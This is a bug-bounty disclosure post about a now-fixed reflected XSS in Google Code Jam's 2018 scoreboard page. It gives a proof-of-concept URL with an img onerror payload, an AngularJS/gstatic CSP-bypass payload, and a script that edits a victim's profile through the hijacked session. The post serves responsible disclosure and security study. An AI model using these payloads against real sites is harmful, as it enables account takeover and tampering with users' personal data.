POC:

https://codejam.withgoogle.com/2018/challenges/0000000000007766/scoreboard/for/%3Cimg%20src=x%20onerror=alert(document.domain)%3E

Information about this XSS:

The XSS will be fired in the toast message.

Also, it seems like you have to open the homepage (https://codejam.withgoogle.com/2018/challenges/) at least once before visiting other pages there.

CSP:

Due to CSP, this XSS will fire only in browsers where it’s not supported (i.e. IE).

If we could somehow find a way to execute a script that has inserted dynamically, we could bypass (thanks to gstatic.com) the CSP using the following payload. But I don’t think it’s possible in this case.

<script src="https://www.gstatic.com/fsn/angular_js-bundle1.js"></script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1)>

Read more about bypassing CSP in my other post.

Attack scenario:

Attacker can get access to victim’s CodeJam account, for example read and edit his profile information (address, phone number, etc).

Here’s an example of how it could be done:

// go to profile page
document.querySelector('[href="/2018/profile"]').click();

setTimeout(function(){
  // change the username
  document.querySelector('#nickname').value = 'mynickname111';
  // create a fake input event 
  var event = document.createEvent("Event");
  event.initEvent('input', false, true); 
  document.querySelector('#nickname').dispatchEvent(event);
  // submit the form
  document.querySelector('[type="submit"]').click();
},1000)

 

Timeline:

29.08.2018: XSS reported
30.08.2018: Accepted
05.09.2018: Fixed

 

ThomasOrlita.cz
Follow me on Twitter: @ThomasOrlita

 

More articles:
XSSing Google Code-in thanks to improperly escaped JSON data
Bypassing Firebase authorization to create custom goo.gl subdomains
How to use Google’s CSP Evaluator to bypass CSP
Stored XSS in WebComponents.org
Stored Angular XSS in Mall.cz

 

< back to the list of web vulns